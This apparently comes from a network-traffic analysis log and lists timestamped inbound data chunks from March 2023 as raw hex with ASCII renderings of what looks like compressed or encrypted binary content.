                                                                                                                            2023-03-21 07:00:06 UTC1471INData Raw: b2 44 7b fe 41 d3 06 3b 5e ae 2a 1e 10 e5 76 ab c7 b9 83 7f 8e 53 8e ca bf fd cd c9 8e 4e 87 72 22 32 4f d6 71 fe 49 bf 29 e3 98 d4 fa 58 fb ab c5 4b a2 c2 34 f3 5e 7d bc 50 35 fd 49 9a 78 54 e2 b5 2e 4d 9c 76 b6 8b de 6e 13 ec b1 7c e3 d3 a3 4d 6b 4f 5c 36 e6 fa c6 c6 dd d2 2f 8f ee 70 3e 77 c6 2c 75 8b 97 dd db be b1 2a 58 30 3d 6d 46 c7 de 13 db cf ea ff 78 6b d8 d0 f8 da 6f ed fc 9a 47 af bc f5 cb b3 b3 bb 2a 67 de 7a 24 f2 29 2e 8c 5f d8 20 fd 51 3b 2d 77 78 45 c4 ee 13 51 1d 6f 5e 7f 97 ef 2b 13 fe 99 90 d9 7b c9 0f 17 0a 8e bd 3b 10 98 d1 20 6f 92 b3 ee fe e0 2e 27 93 ef 88 d7 c7 c4 57 05 bf 2e 9b e7 be be 68 a2 be 7e 97 a7 f5 ad bf 0b 7e bb a7 57 bb 1f 5b 3e 6c d1 66 7e 42 ae a0 e8 f6 e5 0d 01 c9 1b 7f 7d 3c 60 7b f7 84 3f ce 0d 09 17 8f da 58 f5
                                                                                                                            Data Ascii: D{A;^*vSNr"2OqI)XK4^}P5IxT.Mvn|MkO\6/p>w,u*X0=mFxkoG*gz$)._ Q;-wxEQo^+{; o.'W.h~~W[>lf~B}<`{?X
                                                                                                                            2023-03-21 07:00:06 UTC1487INData Raw: 4d 3b 8a 83 dc 01 67 76 8c 57 64 69 e9 13 d5 cf fc f8 1d f5 99 4a 35 0d 84 36 93 65 d0 aa 13 da 2f 2b f3 5f 6b 13 ca 0b c5 c7 39 f2 c5 52 53 d5 6a d6 1d 1c 78 db c4 be 2b e7 e3 29 10 94 60 6a 38 32 5c 61 f3 a7 37 90 f1 eb 88 2c e3 99 52 e3 7c f1 e3 9c 41 18 e0 8f 40 07 a3 02 eb 2d 01 1c 55 fa c0 85 77 1c cc a1 0f 81 ae a1 cb 8c 77 af ac 14 79 8e 38 32 0c 51 b9 65 44 d6 60 32 9e 6c 66 14 83 2c e2 62 9e 4f 4b b7 96 e5 4d 64 ba 04 cb 30 01 5c 40 5e bc 99 2f 91 4c ef f9 a2 94 a9 02 b2 37 a7 f2 5f 42 80 e8 c7 19 08 f0 7e 5b 69 30 1d 66 63 1d 2f db 81 9e 7d 01 74 d9 7b 5b 5e 69 5f 5b 1e 8a b1 e5 55 c4 d9 f1 c4 0b 6c 79 da df 6c 79 2e 0b 6d 79 e2 44 5b 9e ef 0a 08 4b b2 e5 4d 3f 61 cb cb 07 d3 77 a5 2d af a4 bf 2d 6f e3 00 48 07 e0 52 06 f6 d7 2e bc 8d cf 81 de
                                                                                                                            Data Ascii: M;gvWdiJ56e/+_k9RSjx+)`j82\a7,R|A@-Uwwy82QeD`2lf,bOKMd0\@^/L7_B~[i0fc/}t{[^i_[Ulyly.myD[KM?aw--oHR.
                                                                                                                            2023-03-21 07:00:06 UTC1503INData Raw: d1 ff 45 10 cb 74 16 eb d1 35 6d 66 15 21 7b 81 6c 2c cb 7a 87 ad 15 60 4d c2 18 92 86 ef 7b 45 d6 bc 4a f0 4d 2c db 07 31 ac bb 8d aa 24 94 a8 f5 f4 e2 aa 2a 82 e1 48 9e 49 40 3c d8 d6 7a 3d d2 b6 5b e0 76 34 ba f6 31 db 5f 90 03 a6 de cb 03 a7 2f 59 8f 26 b5 dd 80 7a 36 b7 fa d6 1a 12 ba bf 1e 5b 8c 38 86 ba b8 92 6b 10 29 be d6 5b 43 9d c2 5e 5b 11 4d 85 b1 f6 31 73 ce a6 d6 cf b6 27 4d 06 df 7e cf e9 4b ed 56 14 53 1b 53 f9 80 81 46 39 c2 ae e6 e3 2c a0 f6 ea e2 16 72 aa 75 3e cf 71 a3 f7 ea 37 d7 0b ce a3 37 d7 8a de cc 0c 38 0f f3 96 fb e6 d9 ac 37 cf 66 4e b8 60 ed db a3 5b 36 d7 ba dd ea a2 83 b5 0e 19 ef 4e b4 89 5d 3b de 66 62 58 d5 94 30 4e f7 63 ba e7 fd 29 19 c9 60 d9 ad 19 80 29 12 5e a0 01 03 8b 6e 74 b8 a2 ab d5 bd 79 22 57 67 53 74 2f ae
                                                                                                                            Data Ascii: Et5mf!{l,z`M{EJM,1$*HI@<z=[v41_/Y&z6[8k)[C^[M1s'M~KVSSF9,ru>q7787fN`[6N];fbX0Nc)`)^nty"WgSt/
                                                                                                                            2023-03-21 07:00:06 UTC1519INData Raw: 49 bd 4c ee 17 56 8f f5 4a 9e 00 f5 0a 0f 9a fb 55 42 bc fc a0 f9 3a 13 b0 e9 97 b1 ad dc e4 77 d9 d5 ef ad 7b 0f 16 b8 1a 0d f5 64 9e 16 e2 b6 83 d9 bf c7 79 0f 5a 5f 17 1b 95 fc cb a8 37 a0 f4 f7 0c f1 a4 92 6f d9 41 eb fe 0e 28 f9 aa a9 57 d8 a3 8c 9f 78 79 8f 39 5f b5 4d 3e 63 5b b9 35 50 af b6 c7 3c d6 06 e2 40 4f f6 f7 8b 1b 6c c6 5a ab e4 0a 53 2f 6e 28 93 6d 12 c4 49 bd 4c ee 17 16 79 e2 4a 9e 7e ea 39 5f 33 f7 c9 43 5c f8 5a 36 57 bf 4d 9f 8c ed a6 b6 1e ae ff 4a ae 55 c4 3e 43 2e d1 63 f3 fa 57 c9 55 48 bd d0 6b e6 b9 8f 10 c7 95 be 15 f6 58 cf 7d 48 c9 e7 a3 5e 4a e9 9b 23 ce 35 20 9e fd ad 6c 9f 4d df d4 76 a5 b4 59 1e cf 9e b3 0e 9b 76 45 71 65 ae a9 57 1b 37 8f a9 41 1e 5f c9 d7 6f 33 a6 5a 25 5f c5 6b 05 ae c3 86 32 d9 87 01 e2 61 bd 4c ee
                                                                                                                            Data Ascii: ILVJUB:w{dyZ_7oA(Wxy9_M>c[5P<@OlZS/n(mILyJ~9_3C\Z6WMJU>C.cWUHkX}H^J#5 lMvYvEqeW7A_o3Z%_k2aL
                                                                                                                            2023-03-21 07:00:06 UTC1535INData Raw: 49 8c eb 5b 97 ac 71 1d d3 d4 91 75 c9 1a 97 71 da be 6c a9 52 76 a6 a6 6c ed 25 f9 3a f5 92 b2 ff 69 62 fa 95 fa 77 6a ca 26 77 5b 65 eb 4f db af f1 c8 77 59 36 69 e6 a1 5b f4 f7 07 dd f2 ba dd 2d e6 72 43 b7 58 e3 c5 32 dd 2a cb d5 2a ed cf 6e fa 92 7f e3 fa ab 47 b5 af 3f 3d 4d d6 eb cf 60 93 fc 7f 8c 21 f5 df 3d ff 1f 29 cf 7f 34 e3 4b fb 48 be bf f0 91 f2 fc 47 13 e3 57 ea 9f dc ac 59 f3 4a 59 97 a6 6c f8 23 b9 c7 29 7d 09 36 db 9f 43 f3 bb 29 5a 35 f5 c6 f5 88 7a bf d6 23 ce e1 b4 1e 71 0e bf dd 23 ce dd 5c 99 2e 92 e9 32 99 fe b5 4c 7d 32 2d 96 e9 56 99 fe 83 4c 5f eb 11 df 9d f1 af 32 dd df 23 fa 6f de f6 b5 68 f6 31 d9 b7 3e d9 b7 cf 65 df ee c8 ba 1f bc 2c f6 d0 09 97 c5 1e 3a e5 b2 bc f6 5e 16 af 41 e7 5d 16 af 41 dd 97 c5 6b d0 95 97 c5 6b 50
                                                                                                                            Data Ascii: I[quqlRvl%:ibwj&w[eOwY6i[-rCX2**nG?=M`!=)4KHGWYJYl#)}6C)Z5z#q#\.2L}2-VL_2#oh1>e,:^A]AkkP
                                                                                                                            2023-03-21 07:00:06 UTC1551INData Raw: a8 1e e3 78 3e f0 80 d3 a4 c0 f5 f3 2b 27 d8 41 b7 09 23 dd 51 27 a4 78 3a be ac 37 a0 31 8b fb 56 b7 83 8a e1 4f 5f 47 9a 20 96 3c 46 f4 e3 82 79 76 bb 98 0c 90 d1 72 25 39 50 c8 15 02 82 b4 62 aa 59 cc c1 af f0 51 5a a5 9a e3 cd 62 6e 1e e6 55 8b 69 d6 1c 8d 59 18 0a 29 3a 1b 7d e3 66 80 f4 e9 a8 00 95 d1 a2 4f cf b0 ba e4 73 da 54 46 5b 75 84 3d fc cc 9e de c7 0f b6 b0 38 21 46 8b c5 39 4a 92 4d fc 05 11 1e fa 40 f3 00 ea 3a f6 42 06 aa ec 0a f8 e2 04 ad e0 39 6f bc c1 86 8c d4 3a d9 c4 90 c6 3a 79 28 68 6e 64 45 25 7f 86 54 09 fb 4d 9d 5e 03 fc 6d c0 77 4b 84 e0 73 25 ec 3a eb 50 fe 6d 19 fb 5b 87 ac 43 a5 d7 f4 0c 05 32 5a 80 1b 87 4a a5 5f c2 6b c9 6c 2a 9a 35 9c b1 f8 b8 c6 b7 a9 4b 75 97 14 f0 71 bd b1 82 8f eb d0 24 f0 71 ad d8 0c fe 36 70 df 80
                                                                                                                            Data Ascii: x>+'A#Q'x:71VO_G <Fyvr%9PbYQZbnUiY):}fOsTF[u=8!F9JM@:B9o::y(hndE%TM^mwKs%:Pm[C2ZJ_kl*5Kuq$q6p
                                                                                                                            2023-03-21 07:00:06 UTC1567INData Raw: f7 81 7e fd fa 83 af af 0e fa fa 06 82 9f 7f 08 e8 74 03 20 28 30 08 82 83 43 20 68 50 28 0c 1a 34 18 86 0c 19 06 31 91 21 10 1a 36 02 c2 c3 47 40 44 44 24 44 46 46 42 58 c4 18 18 11 35 16 46 8e a4 bd 68 54 34 8c 19 33 06 c6 8e a5 bd 69 5c 34 4c 8d 0e 87 c4 f1 91 90 34 21 0a 26 4e a4 d1 6b 5c 3c ac 8d ac 07 1b 62 9a c0 c6 89 2f c3 a6 d8 a6 b0 39 ee 55 d8 3c e9 55 d8 32 e9 75 d8 32 d9 0d b2 a7 6a 20 3b d1 1d b6 4e f3 84 9c 69 1e 90 93 4c 99 fd 9d dc 06 72 a7 b7 83 6d 33 bc 21 6f 06 7d 4d eb 08 79 69 1d 60 5b 3a 7d 9d d5 05 16 a4 4d 85 9f 67 77 85 82 79 3d a0 60 7e 6f 28 58 d0 17 0a de ed 07 bb 32 7d 61 67 a6 0e 76 2f 09 84 5f 97 0e 82 7d cb 87 c3 de e5 61 b0 2f 2b 1c f6 67 45 c2 81 2f c6 c2 c1 15 d1 70 f8 cb 89 70 78 75 3c 1c ff 26 19 66 a7 cf 80 39 73 e6
                                                                                                                            Data Ascii: ~t (0C hP(41!6G@DD$DFFBX5FhT43i\4L4!&Nk\<b/9U<U2u2j ;NiLrm3!o}Myi`[:}Mgwy=`~o(X2}agv/_}a/+gE/ppxu<&f9s
                                                                                                                            2023-03-21 07:00:06 UTC1583INData Raw: dc 14 26 ce 6d 19 2e b2 b6 46 88 ac ed 26 91 bd 6d 34 8f 63 c4 85 1d a3 45 ce ce 17 45 ce ae 57 44 ce e7 af 88 fc 94 d9 22 3f 75 9e 28 38 18 25 0a 0f 2d 14 6f bc f9 a6 58 f6 f6 5b e2 dd 15 ff 25 de a3 28 1f aa 7c ef bd 3f 8a 8f 3e 5a 25 56 af 59 2d d6 c4 6f 10 09 1b 12 e4 f7 68 24 ed 3f 22 0e 1f 3e 2c 8a 8f be 21 4a be 5c 21 4a bf 7a 4f 94 7d bd 52 58 be 5b 23 2c a7 e2 45 c5 e9 0d a2 22 7d a3 b0 9e dd 22 2a 33 b6 8a aa ac 5d a2 fa fc 5e 51 73 21 55 d4 e6 1d 14 27 4e 9c 10 df 9e 3c 29 4e 9d 3a 25 32 33 33 45 4e 4e 8e fc 5c 52 6d e1 51 71 b9 f8 6b 71 b5 ec 94 b8 66 49 13 37 aa 72 45 61 61 91 b8 75 b9 54 d4 d6 d6 8a ab 57 af 88 eb d7 af 8b db 75 d7 c4 ad 5b b7 c4 9d db f7 bf 0f e3 7e 6a 7e 52 c2 ca c0 0e 9d ec a9 c3 b3 41 0d 29 50 fe 04 05 f5 08 e9 d0 d6 91
                                                                                                                            Data Ascii: &m.F&m4cEEWD"?u(8%-oX[%(|?>Z%VY-oh$?">,!J\!JzO}RX[#,E"}"*3]^Qs!U'N<)N:%233ENN\RmQqkqfI7rEaauTWu[~j~RA)P
                                                                                                                            2023-03-21 07:00:06 UTC1599INData Raw: 39 3f 9f 35 d9 eb ad 5f 7e a9 d2 18 62 df 9c eb d5 b8 a7 b6 f6 6d de bb f8 64 79 79 77 be cb ee 50 56 de 0a 69 e9 10 48 49 ed e5 b5 30 c8 ca 46 f2 bf 5a 02 30 71 a2 3f 14 ba 27 a3 73 e7 54 28 28 a7 40 49 39 1d c3 87 c7 61 c4 88 fd 18 36 ec 20 c7 61 de 73 00 e3 c6 a7 60 ea d4 13 50 55 cd c2 b4 69 d9 98 fe 45 1a d4 d4 e2 30 4b 2d 13 6a ea 69 f8 4a 2f 1b 8b 34 d3 60 6f 7f 1a 0e 0e 27 e1 ec 9c 81 35 6b b2 e1 e1 91 86 f5 eb d3 31 78 70 0e 86 0c c9 c1 a8 29 f9 18 37 ad 08 13 a6 9d c5 e4 85 67 31 65 f1 39 cc 9d 57 88 79 0b 0a f1 d5 57 17 b1 58 e3 12 e6 ce 2d e5 b5 52 a8 e9 5e 85 86 e6 f7 d0 d2 b9 06 1d bd 72 e8 1b 97 c3 60 49 19 0c 4c ca 61 62 52 89 05 e6 79 50 b7 29 84 89 47 21 4c d7 15 41 67 ed 39 68 2e 2b 87 96 c5 0f 30 5a 7e 0b 5a d6 3f 40 d7 a6 02 06 0e 37
                                                                                                                            Data Ascii: 9?5_~bmdyywPViHI0FZ0q?'sT((@I9a6 as`PUiE0K-jiJ/4`o'5k1xp)7g1e9WyWX-R^r`ILabRyP)G!LAg9h.+0Z~Z?@7
                                                                                                                            2023-03-21 07:00:06 UTC1615INData Raw: 49 c8 5b 61 82 6d 33 04 38 56 2d 07 2b b9 7e b5 15 9b 16 be 80 64 aa 67 14 8e 22 de a7 8b b4 c7 14 ca 45 d2 02 fe 1b bf de 61 f3 3f 0e b8 6c 37 23 6c 16 92 e6 6b d6 96 be 48 b7 22 3d bd d8 f1 5f ba d3 15 b1 94 37 15 d2 7a 2d 72 a4 7d db e9 31 28 c5 4f a2 d8 e5 69 94 b8 3d 8b 52 8f e7 a0 f2 ea 87 32 9f bf a1 cc b7 3f ca fd 07 a2 3c 60 30 2a 82 cc 50 b1 72 28 2a 83 cd 09 c3 51 15 42 08 1d c9 a3 3a cc 02 ea 90 91 48 76 1e c2 e7 c0 2c a5 68 57 00 3e 24 bf cb b7 e3 7c 58 74 0f 32 ca ab 63 16 3f 8b ab 17 3f 03 0b b9 f1 f3 4f 88 17 5b 22 cd 4a d0 4e 8f ee 90 46 be 9b ca 90 ff 5a 49 04 32 c5 fd 51 19 36 0a d5 11 63 51 13 39 11 b5 6b 26 13 a6 a2 6e ed 34 d4 ad 7b 05 75 eb a7 a3 9e 50 b7 7e 7a 87 d7 ba c0 dd af 5a fb 0a a4 3e e3 70 ea 80 1a 2c e5 93 26 15 b6 10 ff
                                                                                                                            Data Ascii: I[am38V-+~dg"Ea?l7#lkH"=_7z-r}1(Oi=R2?<`0*Pr(*QB:Hv,hW>$|Xt2c??O["JNFZI2Q6cQ9k&n4{uP~zZ>p,&
                                                                                                                            2023-03-21 07:00:06 UTC1631INData Raw: df 78 f6 ec 39 46 2f 03 9c 17 e3 3d 46 4b 4b ab d5 4e fa f3 12 e7 cd 9f c3 3a f0 67 2c a5 e7 b0 4f 5b ab d3 5e f2 f7 dd 92 97 9b 55 53 72 af 10 f7 9f 11 9c 96 f7 f1 96 88 b6 de cd cb ae 79 58 5e 8a f2 dc 28 d4 94 e7 a1 e6 71 55 8b 78 58 90 00 de 87 f7 bd 5f 5c 80 b2 bb a9 b8 c6 e6 c9 5c bf 4d 2d 7e 3f 55 25 29 88 de f1 4f e1 fc 2c ef 5b 5c 98 87 92 9c 04 84 b1 e7 83 04 ab 61 a8 ba 27 7d 6a ff 07 69 17 11 66 de 0a c5 99 37 84 be 85 f9 59 28 96 c5 09 ef 86 f9 59 b8 f0 ef df 42 b2 fd 22 54 16 34 c6 f2 ab 7b 52 83 fb c9 be c8 0e fc 15 71 96 a3 11 cc e6 f2 c2 f4 28 a1 6f 7e 4e 06 cb df 12 ce ee 04 ad d7 46 20 9b f3 fd d8 7c 1b 6b 3d b9 e1 f9 25 c9 c1 54 38 67 74 d1 94 84 38 71 7c fe ce 4f 8d 10 fa e6 ca a4 b8 2b 8d 16 62 c0 f9 f0 58 48 a6 5a c2 7b cd b8 b3 8b
                                                                                                                            Data Ascii: x9F/=FKKN:g,O[^USryX^(qUxX_\\M-~?U%)O,[\a'}jif7Y(YB"T4{Rq(o~NF |k=%T8gt8q|O+bXHZ{
                                                                                                                            2023-03-21 07:00:06 UTC1647INData Raw: 0e 1c a8 c8 2d d1 da f2 e3 a8 f6 e5 16 44 83 8d b8 89 26 6e b6 91 c0 6d 93 ad a4 d9 56 da 62 27 6d 75 90 c1 76 9d 95 a0 de 18 d8 68 a4 89 67 d8 cb 5a c0 f7 ec a4 b0 6b 1a 4d 3c 8d 14 3c 51 8d 25 91 32 9c e3 63 c1 cc 48 cf 34 9d eb fc fc f3 cf cf 9e 3d fb 22 ab fc e5 cb 97 d7 bc f3 4e b4 3e c8 5a 62 66 e3 6a 66 af a5 70 47 22 7a 04 85 ad a3 32 75 88 a9 27 c3 8e 31 26 16 b1 e3 11 3b 01 b1 e2 10 33 02 b1 75 88 11 89 98 91 88 a5 23 8d ce 14 c2 18 5e 1e e2 66 21 7e 9c 95 95 e7 d0 80 91 ee 63 c7 8e 6d 6f 6f 5f bd 7a f5 9e 3d 7b 4e 9d 3a 05 3f 11 be dd fc 51 6b 32 f5 33 2b d5 e0 ad 60 ab 89 61 5a 09 25 c8 11 45 b8 52 74 ae 54 9d 0a e9 d5 64 62 dc c8 90 52 e7 81 12 3c 51 9c 07 8a 70 41 3a 17 f0 3d 14 e9 8a 74 ae 26 a3 33 46 4b 26 cf 17 65 69 51 fc 08 2b 2f f1 b0
                                                                                                                            Data Ascii: -D&nmVb'muvhgZkM<<Q%2cH4="N>ZbfjfpG"z2u'1&;3u#^f!~cmoo_z={N:?Qk23+`aZ%ERtTdbR<QpA:=t&3FK&eiQ+/
                                                                                                                            2023-03-21 07:00:06 UTC1663INData Raw: bb 9b c9 4c e6 4a 26 93 99 d2 ac 8e 89 31 44 4c 14 8d 26 a0 09 a2 88 22 08 88 80 5c cd d5 dc cd 8d 72 9f 22 8a 20 20 c8 0d 0d 34 47 77 d3 dd 40 43 df f7 7d df 77 37 7d d1 dd a0 93 c9 d4 ce d6 be 2d 99 a9 fd 63 52 63 76 c5 c2 dd f7 53 df a2 5e fe 7b 8a e7 a9 fa 7d 9f b7 e9 73 77 57 4e b7 2e 9d be b3 5c 8c 12 a6 d6 b4 96 a7 47 f7 54 a5 77 14 c5 36 42 c2 4e 24 c0 02 62 8b de bf 9a 7b f0 62 fa 7b 41 a1 eb 24 9a 0d b4 f7 f4 e0 d6 ce 0e cd df 90 58 8f 0e 13 2f 2c 8a 2f a1 a4 21 8f 29 e7 47 e9 21 dd 6b 97 06 28 09 0b 8a 84 79 45 0c 5c 14 35 c1 bb 32 c2 be 32 cc f2 3f 8f f1 3e a8 98 f8 45 fe e0 d1 6e 5c bc c8 14 c3 d6 5d 63 eb a2 d9 ba 23 48 69 00 56 f1 5e 79 87 ce 68 b6 bd 68 6a ad a4 a1 27 23 34 ef c0 41 e8 1b 81 2d 6f 9e 98 f8 d1 a9 fb ef cc 91 15 b1 5d a8 6b
                                                                                                                            Data Ascii: LJ&1DL&"\r" 4Gw@C}w7}-cRcvS^{}swWN.\GTw6BN$b{b{A$X/,/!)G!k(yE\522?>En\]c#HiV^yhhj'#4A-o]k
                                                                                                                            2023-03-21 07:00:06 UTC1679INData Raw: 89 28 d0 31 a5 3f c3 c2 d8 b2 b2 d3 92 92 74 31 b1 76 11 91 06 61 e1 2a 11 91 3a 51 d1 26 61 e1 81 7d fb a6 79 79 c7 4e 9d aa fd eb e7 3c 5e d6 d7 95 94 bc b0 75 b0 f3 f1 f3 41 63 51 5e fe 77 3b 68 f4 85 3e f6 61 3e 56 d3 db df d2 3f e3 63 44 22 11 ac a9 bb bb 7b a9 f7 be b2 12 1e b0 99 a3 ec b1 91 c6 ca 12 9f db a6 1f d1 ca ce 47 14 fb f6 bd 9a 93 67 d7 eb e5 9c 9c db 67 96 8e 6d 0b 65 db fc 7a 69 5e 33 76 c2 e5 e1 75 62 2b 58 99 e0 ad 08 58 82 8f ed b9 19 30 e7 63 a5 f7 ac 33 cc cf 7f 0a 15 06 de 5e ec 63 d4 ee 8e 70 4d c5 42 27 dd 4a 3f f3 32 17 ed ea 3b 3a 75 7e 46 3f 79 63 ce 37 a6 43 64 c8 d4 26 a9 f7 e6 5c 7e 99 24 e6 ae d1 1e 66 4d 0a b7 55 75 56 fd 09 af 2d db 9a 66 59 97 45 a2 50 a8 54 6a 37 b9 cf a8 36 53 b6 25 6d ab 2f 56 23 cc 71 72 72 61 27
                                                                                                                            Data Ascii: (1?t1va*:Q&a}yyN<^uAcQ^w;h>a>V?cD"{Gggmezi^3vub+XX0c3^cpMB'J?2;:u~F?yc7Cd&\~$fMUuV-fYEPTj76S%m/V#qrra'
                                                                                                                            2023-03-21 07:00:06 UTC1695INData Raw: 8b 83 51 10 2c b4 0b 38 c0 3c 88 8b c7 fe 6b 11
                                                                                                                            Data Ascii: Q,8<k
                                                                                                                            2023-03-21 07:00:06 UTC1695INData Raw: 3b 71 c0 76 a6 a6 d8 ff 1f 87 85 85 a5 a6 a6 16 14 14 54 55 55 41 5c a1 6f 2c b5 ec 7c 17 fd f4 fb c2 6d 27 26 97 20 4d 86 53 10 35 a3 5f a5 b7 27 45 fb b3 6e 17 d7 3c a8 6e 69 aa af ae ac b8 99 9f 95 91 c2 8c 0c f6 f0 73 b7 71 b1 63 38 5a 6a 7b 5f 34 0a f2 38 1b e6 65 c7 f4 73 bc e2 6a 11 1f ee e9 e1 c0 48 89 f6 bd 91 19 69 66 70 e5 88 6c dd d5 cc 6e 57 e7 8a 80 cb f6 d2 3b d6 ad 5e b5 0c 46 65 18 9a 78 f4 58 ac f9 f1 a6 82 5d 95 f1 8b 82 8d 4b ca 4a 53 f2 b2 df 8e 31 55 68 ce c5 7b 9f a0 12 4b 9b 1f 6b 5d de d5 c2 7e 46 f0 ad 7a 6e 7d 50 9c 12 1b 6a 6d 69 a6 af af 7f c1 ce fa 4e 51 d6 b3 ae 7a 1e 47 ab 80 da 51 52 52 f2 f3 f3 cf ce ce 61 b1 2a b2 b3 af fb f9 f9 81 02 87 6b 0a 37 c3 03 0a 6a 70 e2 03 2e 53 4d 1c 3c 7c f8 70 7c 4b ec cf e8 2f 63 7d 7f ac
                                                                                                                            Data Ascii: ;qvTUUA\o,|m'& MS5_'En<nisqc8Zj{_48esjHifplnW;^FexX]KJS1Uh{Kk]~Fzn}PjmiNQzGQRRa*k7jp.SM<|p|K/c}
                                                                                                                            2023-03-21 07:00:06 UTC1711INData Raw: eb 0e f9 86 d4 99 dc 7a 8d 11 92 16 70 9b 45 e4 56 6e 0c 69 f1 b9 64 a0 94 9f e3 33 d9 da 0c 50 d3 42 d1 de 10 9f 01 ac fd 10 61 2d 7a 4a 6d 20 7a 62 8c e2 9f 0a 5f 60 9a df 34 a3 09 c8 a9 11 be f5 1b 41 6e 06 9c 0d e5 42 23 6b 6d 40 eb a7 d3 31 7e 53 0c d1 18 d6 89 f8 c5 16 7f c8 6b c1 fe 1b 1c fc af 62 ff 8d 0e fe 79 ec bf c9 c1 7f 28 fb 6f b6 f1 2f 86 7a 37 2f 82 73 31 97 35 82 f5 36 fe f5 50 ff c5 58 36 da a0 fd b6 d8 e8 0f 42 bf cb b0 44 35 c2 b2 0d 60 5f ba 6b 79 5d 86 9c 96 20 af 6d cc 8b 4a 22 95 c7 d6 68 f9 c1 d0 4a fc 6e 65 fc be c4 e4 77 8d cd 15 44 d9 ba 98 75 dd 6e d1 a5 44 5b ca 0e da c2 a9 a5 d0 89 1c c9 76 3a 03 ff 16 60 a9 d6 9e 6e 4f 11 32 b2 8f 92 29 ca 19 f5 74 8a 44 9f 46 2f 69 03 45 5d 59 24 f8 b6 12 39 8f 72 5a be 28 79 54 63 8e 12
                                                                                                                            Data Ascii: zpEVnid3PBa-zJm zb_`4AnB#km@1~Skby(o/z7/s156PX6BD5`_ky] mJ"hJnewDunD[v:`nO2)tDF/iE]Y$9rZ(yTc
                                                                                                                            2023-03-21 07:00:06 UTC1727INData Raw: 97 fb e1 b1 a3 79 5b d0 a0 d3 60 13 c1 24 f1 18 da 8d 7a b4 1b b4 68 27 c7 6f d3 37 dc ea 83 56 8d e6 ba 2a 34 d5 56 a2 b1 a6 02 0d aa 52 34 aa ab b0 9e f4 41 1c fa 9e 8a 3e 0d 9c 3e 1b c8 89 df ee 9c 76 c6 63 47 76 ac 47 bb d5 42 f0 0d d8 4c f0 9b 08 7e 93 51 77 c7 3e 90 d8 12 49 9c 89 c6 ea 72 24 71 27 eb 03 1d 07 29 67 69 23 7d f0 b7 13 9f 6e 2a 7b 51 fe a2 3c 46 f9 cc d9 87 ee 9d e1 37 5b 8c d8 7c 8f 3e 98 eb 54 ec f8 59 1f 54 65 a4 1f 65 ec 5c 74 c0 7f 22 39 81 c7 f8 8b fa d1 0f 3f 09 df 7a 0b bf 93 3e 90 98 da 31 06 b5 95 6c 0c e8 79 e8 80 ef f9 c9 c9 8f 19 6f 51 fe a2 f3 98 f2 59 67 f8 fb 37 29 9a ed 36 8a 6f 42 bc 47 1f 2c 0d b5 6c 0c 5a ce 03 ed 87 c5 d0 8a ff 4f fa 90 3b ca 57 94 b7 a8 af 52 fe a0 7c d6 19 fe 81 1c 85 96 e1 5b 09 3e d5 4e fa 41
                                                                                                                            Data Ascii: y[`$zh'o7V*4VR4A>>vcGvGBL~Qw>Ir$q')gi#}n*{Q<F7[|>TYTee\t"9?z>1lyoQYg7)6oBG,lZO;WR|[>NA
                                                                                                                            2023-03-21 07:00:06 UTC1743INData Raw: f3 3c ce 3d d6 0d c5 01 eb 54 71 43 e9 06 3c 74 e8 90 f0 1b b9 ae 93 1e 17 8d 3d 32 b6 22 54 dd c2 ae 39 9f 61 a4 b7 bb e0 9d 7d 7b 1e 33 96 07
                                                                                                                            Data Ascii: <=TqC<t=2"T9a}{3
                                                                                                                            2023-03-21 07:00:06 UTC1743INData Raw: ae c5 f1 18 72 ff cb 6a ce ec c3 11 fd 39 7f d6 be be a3 fe 7e 1e 4b c5 d4 3e 35 33 8e 2d c5 8f 33 c7 a1 6f 8a af f0 95 be fb ee 3b 0c 76 5d 88 fa 3b 2b 11 be be 8e 83 bf bd 81 0b 8d 0d 70 47 59 99 a0 81 7d 75 41 63 7a ba 90 03 ae bb ca d6 1d f0 3a 12 6a df b5 61 7b 6d c2 ba df ea 94 34 18 3b 26 0e c4 8e 49 83 b0 73 22 e3 40 ec b3 5e 15 0d ae 47 a2 f6 f1 25 d8 73 c3 98 da d5 fb 57 8b f6 1d 2c 2d b0 f8 cc 4f 08 a7 6e e2 d8 f3 b5 b8 26 38 50 f4 37 cb 26 f3 ce 34 70 df b3 1c 70 7f b0 af c4 f3 80 e6 43 1d f5 e1 80 86 ed 77 4a fe f8 9e c6 85 60 54 fb d9 1f 67 9c 0b 44 ed df 82 51 e7 72 98 40 bd 2b 61 68 74 2b 0a 0d be 0b 45 a5 bc 49 0f 53 8f a6 a2 ae 96 26 e2 9d 6a 84 9f 6b 70 e4 f9 1a fc f7 ce 32 74 73 75 15 72 c2 73 84 f5 04 f7 35 cf 47 d9 da 11 96 3f 4f 4f
                                                                                                                            Data Ascii: rj9~K>53-3o;v];+pGY}uAcz:ja{m4;&Is"@^G%sW,-On&8P7&4ppCwJ`TgDQr@+aht+EIS&jkp2tsurs5G?OO
                                                                                                                            2023-03-21 07:00:07 UTC1759INData Raw: 54 df c6 cf d7 b3 6e 09 ec 8b fd 6c c4 79 66 d4 d0 a8 bd 8b f7 fb 7e ab 3b 4c 9a 07 f4 bd da f2 4d b7 f3 ac 4f 32 5f c1 e2 27 5d 1d 85 9e 97 3a 9f a6 a6 a6 28 91 62 73 fe fc f9 52 cc da d9 d9 c9 9a d4 8a c2 43 82 89 87 05 b9 7f c2 35 85 40 d1 82 08 87 fc 70 7b 24 90 25 ae 8a 25 62 4d 4c a5 3c 94 da c9 53 5e 24 f5 ee 1d 0b 8a 0e b4 ca 90 a9 af c5 66 aa 86 a9 cc ce 26 37 db c2 38 9e ab c7 02 dd 45 e1 32 1f 12 13 a4 e3 73 dd c5 04 84 26 68 88 e6 64 a7 b6 d0 5a d7 cf 03 98 f5 4e 34 fd 60 f3 82 1d e7 be f9 e5 92 a3 47 9c 51 c7 84 d7 de 8d 1f 3b 2e 56 63 e5 be 42 30 78 65 64 dc a8 21 57 45 0b 70 44 33 4f 65 00 9e 98 52 02 2a b8 91 0f ba 02 aa 99 19 fc ab 55 38 6d f5 31 1b 15 11 31 6c e8 50 50 f4 d1 a3 c7 c5 c5 77 8b 8a 8a 21 ba 8d b5 2f 79 8f 83 70 ca 03 ad f0
                                                                                                                            Data Ascii: Tnlyf~;LMO2_']:(bsRC5@p{$%%bML<S^$f&78E2s&hdZN4`GQ;.VcB0xed!WEpD3OeR*U8m11lPPw!/yp
